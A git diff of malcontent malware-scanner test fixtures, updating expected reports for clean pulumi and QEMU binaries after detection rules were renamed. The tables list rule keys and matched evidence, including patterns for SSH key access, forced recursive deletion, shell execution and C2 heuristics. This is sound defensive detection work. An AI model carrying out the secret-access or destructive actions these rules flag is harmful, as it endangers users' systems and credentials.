[client_port](https://github.com/search?q=client_port&type=code)
[config_port](https://github.com/search?q=config_port&type=code)
[curlopt_port](https://github.com/search?q=curlopt_port&type=code)
[defaultPort](https://github.com/search?q=defaultPort&type=code)
[domain_port](https://github.com/search?q=domain_port&type=code)
[eIp](https://github.com/search?q=eIp&type=code)
[ereghet_ip](https://github.com/search?q=ereghet_ip&type=code)
[framed_ip](https://github.com/search?q=framed_ip&type=code)
[ftp_port](https://github.com/search?q=ftp_port&type=code)
[gamhet_ip](https://github.com/search?q=gamhet_ip&type=code)
[getPort](https://github.com/search?q=getPort&type=code)
[get_port](https://github.com/search?q=get_port&type=code)
[gomphet_ip](https://github.com/search?q=gomphet_ip&type=code)
[host_ip](https://github.com/search?q=host_ip&type=code)
[http_port](https://github.com/search?q=http_port&type=code)
[internal_ip](https://github.com/search?q=internal_ip&type=code)
[ipproto_ip](https://github.com/search?q=ipproto_ip&type=code)
[is_port](https://github.com/search?q=is_port&type=code)
[lat_port](https://github.com/search?q=lat_port&type=code)
[lloghet_ip](https://github.com/search?q=lloghet_ip&type=code)
[lnormhet_ip](https://github.com/search?q=lnormhet_ip&type=code)
[local_ip](https://github.com/search?q=local_ip&type=code)
[local_port](https://github.com/search?q=local_port&type=code)
[login_ip](https://github.com/search?q=login_ip&type=code)
[mIp](https://github.com/search?q=mIp&type=code)
[nas_ip](https://github.com/search?q=nas_ip&type=code)
[nas_port](https://github.com/search?q=nas_port&type=code)
[open_port](https://github.com/search?q=open_port&type=code)
[pg_port](https://github.com/search?q=pg_port&type=code)
[primary_ip](https://github.com/search?q=primary_ip&type=code)
[primary_port](https://github.com/search?q=primary_port&type=code)
[proxyPort](https://github.com/search?q=proxyPort&type=code)
[radius_port](https://github.com/search?q=radius_port&type=code)
[sam_port](https://github.com/search?q=sam_port&type=code)
[serverPort](https://github.com/search?q=serverPort&type=code)
[server_port](https://github.com/search?q=server_port&type=code)
[setPort](https://github.com/search?q=setPort&type=code)
[socketPort](https://github.com/search?q=socketPort&type=code)
[tcp_port](https://github.com/search?q=tcp_port&type=code)
[uriPort](https://github.com/search?q=uriPort&type=code)
[url_port](https://github.com/search?q=url_port&type=code)
[validate_ip](https://github.com/search?q=validate_ip&type=code)
[weibhet_ip](https://github.com/search?q=weibhet_ip&type=code)
[xIp](https://github.com/search?q=xIp&type=code) |
+| MEDIUM | [c2/addr/server](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/server.yara#server_address) | references a 'server address', possible C2 client | [inet_server_addr](https://github.com/search?q=inet_server_addr&type=code) |
 | MEDIUM | [c2/discovery/dyndns](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/discovery/dyndns.yara#dynamic_dns_user) | dynamic dns user | [dyndns](https://github.com/search?q=dyndns&type=code) |
-| MEDIUM | [c2/server_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/server_address.yara#server_address) | references a 'server address', possible C2 client | [inet_server_addr](https://github.com/search?q=inet_server_addr&type=code) |
 | MEDIUM | [collect/archives/unarchive](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/archives/unarchive.yara#unarchive) | unarchives files | [unarchived](https://github.com/search?q=unarchived&type=code) |
 | MEDIUM | [collect/archives/zip](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/archives/zip.yara#zip) | Works with zip files | [ZIP64](https://github.com/search?q=ZIP64&type=code) |
 | MEDIUM | [collect/databases/mysql](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/databases/mysql.yara#mysql) | accesses MySQL databases | [mysql](https://github.com/search?q=mysql&type=code) |
@@ -21,7 +21,7 @@
 | MEDIUM | [discover/group/lookup](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/group/lookup.yara#getgrent) | get entry from group database | [endgrent](https://github.com/search?q=endgrent&type=code)
[getgrent](https://github.com/search?q=getgrent&type=code)
[setgrent](https://github.com/search?q=setgrent&type=code) |
 | MEDIUM | [discover/network/netstat](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/netstat.yara#netstat) | Uses 'netstat' for network information | [netstat](https://github.com/search?q=netstat&type=code) |
 | MEDIUM | [discover/process/effective_groupid_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/effective-groupid-get.yara#php_getmygid) | returns the effective group id of the current process | [getmygid](https://github.com/search?q=getmygid&type=code) |
-| MEDIUM | [discover/process/name_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/name-get.yara#process_name) | get the current process name | [process_name](https://github.com/search?q=process_name&type=code) |
+| MEDIUM | [discover/process/name](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/name.yara#process_name) | get the current process name | [process_name](https://github.com/search?q=process_name&type=code) |
 | MEDIUM | [discover/user/name_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/username-get.yara#whoami) | [returns the user name running this process](https://man7.org/linux/man-pages/man1/whoami.1.html) | [whoami](https://github.com/search?q=whoami&type=code) |
 | MEDIUM | [evasion/file/prefix](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/prefix/prefix.yara#static_hidden_path) | possible hidden file path | [/home/linuxbrew/.linuxbrew](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew&type=code) |
 | MEDIUM | [exec/cmd](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/cmd/cmd.yara#exec) | executes a command | [CmdForListBodyStartCmd](https://github.com/search?q=CmdForListBodyStartCmd&type=code)
[SystemziProcess_runCommand1_closure](https://github.com/search?q=SystemziProcess_runCommand1_closure&type=code)
[SystemziProcess_runCommand1_info](https://github.com/search?q=SystemziProcess_runCommand1_info&type=code)
[SystemziProcess_runCommand2_closure](https://github.com/search?q=SystemziProcess_runCommand2_closure&type=code)
[SystemziProcess_runCommand3_bytes](https://github.com/search?q=SystemziProcess_runCommand3_bytes&type=code)
[SystemziProcess_runCommand_closure](https://github.com/search?q=SystemziProcess_runCommand_closure&type=code)
[SystemziProcess_runCommand_info](https://github.com/search?q=SystemziProcess_runCommand_info&type=code)
[execCommand](https://github.com/search?q=execCommand&type=code) |
@@ -89,7 +89,7 @@
 | LOW | [data/hash/sha1](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/hash/sha1.yara#SHA1) | Uses the SHA1 signature format | [SHA1_](https://github.com/search?q=SHA1_&type=code) |
 | LOW | [data/hash/sha256](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/hash/sha256.yara#SHA256) | Uses the SHA256 signature format | [SHA256_](https://github.com/search?q=SHA256_&type=code) |
 | LOW | [data/random/insecure](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/random/insecure.yara#bsd_rand) | [generate random numbers insecurely](https://man.openbsd.org/rand) | [_rand](https://github.com/search?q=_rand&type=code)
[srand](https://github.com/search?q=srand&type=code) |
-| LOW | [discover/process/parent_pid_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/parent_pid-get.yara#getppid) | gets parent process ID | [getppid](https://github.com/search?q=getppid&type=code) |
+| LOW | [discover/process/parent](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/parent.yara#getppid) | gets parent process ID | [getppid](https://github.com/search?q=getppid&type=code) |
 | LOW | [discover/system/cpu_info](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/cpu-info.yara#processor_count) | [gets number of processors](https://man7.org/linux/man-pages/man3/get_nprocs.3.html) | [nproc](https://github.com/search?q=nproc&type=code) |
 | LOW | [discover/system/hostname_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname-get.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) |
 | LOW | [discover/system/machine_id](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/machine_id.yara#machineid) | Gets a unique machineid for the host | [machineid](https://github.com/search?q=machineid&type=code) |
@@ -97,6 +97,7 @@
 | LOW | [discover/user/HOME](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/HOME.yara#HOME) | [Looks up the HOME directory for the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [HOME](https://github.com/search?q=HOME&type=code)
[getenv](https://github.com/search?q=getenv&type=code) |
 | LOW | [discover/user/USER](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/USER.yara#USER) | [Looks up the USER name of the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [USER](https://github.com/search?q=USER&type=code)
[getenv](https://github.com/search?q=getenv&type=code) |
 | LOW | [evasion/logging/acct](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/logging/acct.yara#acct) | switch process accounting on or off | [acct](https://github.com/search?q=acct&type=code) |
+| LOW | [evasion/process_injection/ptrace](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/process_injection/ptrace.yara#known_ptrace_injectors) | known ptrace injectors | [BPF](https://github.com/search?q=BPF&type=code) |
 | LOW | [exec/conditional/LANG](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/conditional/LANG.yara#LANG_getenv) | Looks up language of current user | [LANG](https://github.com/search?q=LANG&type=code)
[getenv](https://github.com/search?q=getenv&type=code) |
 | LOW | [exec/dylib/iterate](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/dylib/iterate.yara#dl_iterate_phdr) | [iterate over list of shared objects](https://man7.org/linux/man-pages/man3/dl_iterate_phdr.3.html) | [dl_iterate_phdr](https://github.com/search?q=dl_iterate_phdr&type=code) |
 | LOW | [exec/plugin](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/plugin/plugin.yara#plugin) | references a 'plugin' | [Plugin_Abstract](https://github.com/search?q=Plugin_Abstract&type=code)
[QAccessiblePlugin](https://github.com/search?q=QAccessiblePlugin&type=code)
[QAudioSystemPlugin](https://github.com/search?q=QAudioSystemPlugin&type=code)
[QGenericPluginFactory](https://github.com/search?q=QGenericPluginFactory&type=code)
[QIconEnginePlugin](https://github.com/search?q=QIconEnginePlugin&type=code)
[QImageIOPlugin](https://github.com/search?q=QImageIOPlugin&type=code)
[QMediaServiceProviderPlugin](https://github.com/search?q=QMediaServiceProviderPlugin&type=code)
[QPictureFormatPlugin](https://github.com/search?q=QPictureFormatPlugin&type=code)
[QPluginLoader](https://github.com/search?q=QPluginLoader&type=code)
[QQmlEngineExtensionPlugin](https://github.com/search?q=QQmlEngineExtensionPlugin&type=code)
[QQmlExtensionPlugin](https://github.com/search?q=QQmlExtensionPlugin&type=code)
[QScriptExtensionPlugin](https://github.com/search?q=QScriptExtensionPlugin&type=code)
[QSqlDriverPlugin](https://github.com/search?q=QSqlDriverPlugin&type=code)
[QStaticPlugin](https://github.com/search?q=QStaticPlugin&type=code)
[QStylePlugin](https://github.com/search?q=QStylePlugin&type=code)
[QTextToSpeechPlugin](https://github.com/search?q=QTextToSpeechPlugin&type=code)
[QVirtualKeyboardExtensionPlugin](https://github.com/search?q=QVirtualKeyboardExtensionPlugin&type=code)
[addCorePlugin_closure](https://github.com/search?q=addCorePlugin_closure&type=code)
[addCorePlugin_info](https://github.com/search?q=addCorePlugin_info&type=code)
[enabledPlugin](https://github.com/search?q=enabledPlugin&type=code)
[js plugins](https://github.com/search?q=js+plugins&type=code)
[msession_plugin](https://github.com/search?q=msession_plugin&type=code)
[mysqlnd_uh_server_option_plugin_dir](https://github.com/search?q=mysqlnd_uh_server_option_plugin_dir&type=code)
[plugin_abstract](https://github.com/search?q=plugin_abstract&type=code)
[plugin_path](https://github.com/search?q=plugin_path&type=code)
[qAddCorePlugin_closure](https://github.com/search?q=qAddCorePlugin_closure&type=code)
[qAddCorePlugin_info](https://github.com/search?q=qAddCorePlugin_info&type=code) |
diff --git a/tests/linux/clean/pulumi.simple b/tests/linux/clean/pulumi.simple
index f881eac07..e1f07cb35 100644
--- a/tests/linux/clean/pulumi.simple
+++ b/tests/linux/clean/pulumi.simple
@@ -3,7 +3,7 @@
 3P/threat_hunting/sharppack: medium
 c2/addr/http_dynamic: medium
 c2/addr/ip: medium
-c2/server_address: medium
+c2/addr/server: medium
 c2/tool_transfer/download: medium
 collect/archives/zip: medium
 collect/databases/mysql: medium
@@ -38,7 +38,7 @@ discover/cloud/google_metadata: low
 discover/cloud/google_storage: low
 discover/group/lookup: medium
 discover/network/mac_address: medium
-discover/process/parent_pid_get: low
+discover/process/parent: low
 discover/processes/list: medium
 discover/system/cpu_info: low
 discover/system/hostname_get: low
diff --git a/tests/linux/clean/qemu-system-xtensa.md b/tests/linux/clean/qemu-system-xtensa.md
index 36b975a5a..a3b559e84 100644
--- a/tests/linux/clean/qemu-system-xtensa.md
+++ b/tests/linux/clean/qemu-system-xtensa.md
@@ -1,98 +1,99 @@ ## linux/clean/qemu-system-xtensa [🛑 HIGH] -| RISK | KEY | DESCRIPTION | EVIDENCE | -|--------|--------------------------------------------------------------------------------------------------------------------------------------------------------|------------------------------------------------------------------------------------------------------------------------------------------------------------|-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------------------------------------------------| -| HIGH | [crypto/xor](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/xor.yara#xor_decode_encode) | decodes/encodes XOR content | [Opcode_xor_encode_fns](https://github.com/search?q=Opcode_xor_encode_fns&type=code) | -| MEDIUM | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#ip_port_mention) | mentions an IP and port | [IP](https://github.com/search?q=IP&type=code)
[Ip](https://github.com/search?q=Ip&type=code)
[Port](https://github.com/search?q=Port&type=code)
[add_port](https://github.com/search?q=add_port&type=code)
[ahci_port](https://github.com/search?q=ahci_port&type=code)
[and_port](https://github.com/search?q=and_port&type=code)
[be_port](https://github.com/search?q=be_port&type=code)
[claim_port](https://github.com/search?q=claim_port&type=code)
[clear_port](https://github.com/search?q=clear_port&type=code)
[compare_ip](https://github.com/search?q=compare_ip&type=code)
[ehci_port](https://github.com/search?q=ehci_port&type=code)
[extract_ip](https://github.com/search?q=extract_ip&type=code)
[find_port](https://github.com/search?q=find_port&type=code)
[fix_port](https://github.com/search?q=fix_port&type=code)
[get_ip](https://github.com/search?q=get_ip&type=code)
[get_port](https://github.com/search?q=get_port&type=code)
[handle_port](https://github.com/search?q=handle_port&type=code)
[host_port](https://github.com/search?q=host_port&type=code)
[hub_port](https://github.com/search?q=hub_port&type=code)
[megasas_port](https://github.com/search?q=megasas_port&type=code)
[mem_port](https://github.com/search?q=mem_port&type=code)
[message_port](https://github.com/search?q=message_port&type=code)
[metadata_ip](https://github.com/search?q=metadata_ip&type=code)
[mmio_port](https://github.com/search?q=mmio_port&type=code)
[mptsas_port](https://github.com/search?q=mptsas_port&type=code)
[ohci_port](https://github.com/search?q=ohci_port&type=code)
[pcie_port](https://github.com/search?q=pcie_port&type=code)
[register_port](https://github.com/search?q=register_port&type=code)
[release_port](https://github.com/search?q=release_port&type=code)
[remove_port](https://github.com/search?q=remove_port&type=code)
[reset_port](https://github.com/search?q=reset_port&type=code)
[serial_port](https://github.com/search?q=serial_port&type=code)
[spdm_port](https://github.com/search?q=spdm_port&type=code)
[state_port](https://github.com/search?q=state_port&type=code)
[throttle_port](https://github.com/search?q=throttle_port&type=code)
[uhci_port](https://github.com/search?q=uhci_port&type=code)
[update_ip](https://github.com/search?q=update_ip&type=code)
[upstream_port](https://github.com/search?q=upstream_port&type=code)
[usb_port](https://github.com/search?q=usb_port&type=code)
[virtser_port](https://github.com/search?q=virtser_port&type=code)
[write_port](https://github.com/search?q=write_port&type=code)
[xhci_port](https://github.com/search?q=xhci_port&type=code) |
-| MEDIUM | [c2/refs](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/refs.yara#command_and_control) | Uses terms that may reference a command and control server | [c2_port](https://github.com/search?q=c2_port&type=code) |
-| MEDIUM | [c2/server_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/server_address.yara#server_address) | references a 'server address', possible C2 client | [vnc_init_basic_info_from_server_addr](https://github.com/search?q=vnc_init_basic_info_from_server_addr&type=code) |
-| MEDIUM | [collect/databases/sqlite](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/databases/sqlite.yara#sqlite) | accesses SQLite databases | [sqlite](https://github.com/search?q=sqlite&type=code) |
-| MEDIUM | [credential/ssh](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/ssh/ssh.yara#ssh_folder) | [accesses SSH configuration and/or keys](https://www.sentinelone.com/blog/macos-malware-2023-a-deep-dive-into-emerging-trends-and-evolving-techniques/) | [~/.ssh/config](https://github.com/search?q=~%2F.ssh%2Fconfig&type=code) |
-| MEDIUM | [data/base64/decode](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/base64/base64-decode.yara#py_base64_decode) | decode base64 strings | [base64_decode](https://github.com/search?q=base64_decode&type=code) |
-| MEDIUM | [discover/network/mac_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/mac-address.yara#macaddr) | Retrieves network MAC address | [MAC address](https://github.com/search?q=MAC+address&type=code) |
-| MEDIUM | [evasion/file/prefix](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/prefix/prefix.yara#static_hidden_path) | possible hidden file path | [/home/linuxbrew/.linuxbrew](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew&type=code) |
-| MEDIUM | 
[evasion/indicator_blocking/vm](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/indicator_blocking/vm.yara#hidden_qemu) | operates a QEMU VM | [QEMU_VFIO](https://github.com/search?q=QEMU_VFIO&type=code)
[unable to find CPU model '%s'](https://github.com/search?q=unable+to+find+CPU+model+%27%25s%27&type=code) |
-| MEDIUM | [exec/cmd](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/cmd/cmd.yara#exec) | executes a command | [qapi_free_MigrationExecCommand](https://github.com/search?q=qapi_free_MigrationExecCommand&type=code)
[visit_type_MigrationExecCommand_members](https://github.com/search?q=visit_type_MigrationExecCommand_members&type=code) |
-| MEDIUM | [exec/program](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program.yara#execall) | executes external programs | [execv](https://github.com/search?q=execv&type=code) |
-| MEDIUM | [exec/shell/exec](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/exec.yara#calls_shell) | executes shell | [/bin/sh](https://github.com/search?q=%2Fbin%2Fsh&type=code) |
-| MEDIUM | [exec/tty/open](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/tty/open.yara#openpty) | finds and opens an available pseudoterminal | [openpty](https://github.com/search?q=openpty&type=code) |
-| MEDIUM | [fs/attributes/set](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/attributes/set.yara#remove_xattr) | [set an extended file attribute value](https://developer.apple.com/library/archive/documentation/System/Conceptual/ManPages_iPhoneOS/man2/setxattr.2.html) | [setxattr](https://github.com/search?q=setxattr&type=code) |
-| MEDIUM | [fs/file/delete_forcibly](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-delete-forcibly.yara#rm_recursive_force) | Forcibly deletes files recursively | [rm -rf](https://github.com/search?q=rm+-rf&type=code) |
-| MEDIUM | [fs/file/times_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-times-set.yara#shell_toucher) | change file timestamps | [touch event kind](https://github.com/search?q=touch+event+kind&type=code)
[touch event type](https://github.com/search?q=touch+event+type&type=code)
[touch slot number](https://github.com/search?q=touch+slot+number&type=code) |
-| MEDIUM | [fs/path/home](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/home.yara#home_path) | references path within /home | [/home/linuxbrew/.linuxbrew/Cellar/qemu/9.1.0/bin](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Fqemu%2F9.1.0%2Fbin&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/qemu/9.1.0/etc/qemu-ifdown](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Fqemu%2F9.1.0%2Fetc%2Fqemu-ifdown&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/qemu/9.1.0/etc/qemu-ifup](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Fqemu%2F9.1.0%2Fetc%2Fqemu-ifup&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/qemu/9.1.0/etc/qemu/qemu.conf](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Fqemu%2F9.1.0%2Fetc%2Fqemu%2Fqemu.conf&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/qemu/9.1.0/libexec/qemu-bridge-helpe](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Fqemu%2F9.1.0%2Flibexec%2Fqemu-bridge-helpe&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/qemu/9.1.0/share/icons](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Fqemu%2F9.1.0%2Fshare%2Ficons&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/qemu/9.1.0/share/locale](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Fqemu%2F9.1.0%2Fshare%2Flocale&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/qemu/9.1.0/share/qemu-firmware](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Fqemu%2F9.1.0%2Fshare%2Fqemu-firmware&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/qemu/9.1.0/var](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Fqemu%2F9.1.0%2Fvar&type=code)
[/home/linuxbrew/.linuxbrew/lib/ld.so](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Flib%2Fld.so&type=code)
